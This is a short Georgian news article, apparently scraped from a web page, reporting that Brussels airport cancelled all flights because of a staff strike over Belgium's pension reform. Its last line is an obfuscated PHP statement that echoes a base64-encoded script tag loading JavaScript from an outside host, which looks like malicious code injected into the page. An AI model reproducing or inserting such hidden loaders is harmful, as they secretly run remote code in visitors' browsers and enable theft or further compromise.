gorgia
ავერსი jaluzi

ბრიუსელის აეროპორტიდან დღეს დაგეგმილი ყველა ავიარეისი გადაიდო, - ინფორმაციას Bloomberg-ი ავრცელებს.

გამოცემის ცნობით, ფრენების გადადების მიზეზი აეროპორტის პერსონალის გაფიცვაა. ადმინისტრაციაში განმარტავენ, რომ აეროპორტიდან დღეს არცერთი ავიარეისი არ შესრულდება და შესაძლოა, ზოგიერთი შემომავალი რეისიც გაუქმდეს.

გაფიცვას ბოლო ორი თვის განმავლობაში კიდევ ორი საყოველთაო გაფიცვა უძღოდა წინ.

ბელგიის პროფკავშირების პროტესტი ქვეყნის ახალი მთავრობის პოლიტიკას უკავშირდება, კერძოდ, საპენსიო რეფორმას, რომელიც მათი შეფასებით, ნაკლებად სასარგებლოა დაბალი შემოსავლის მქონე ადამიანებისთვის.

171
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");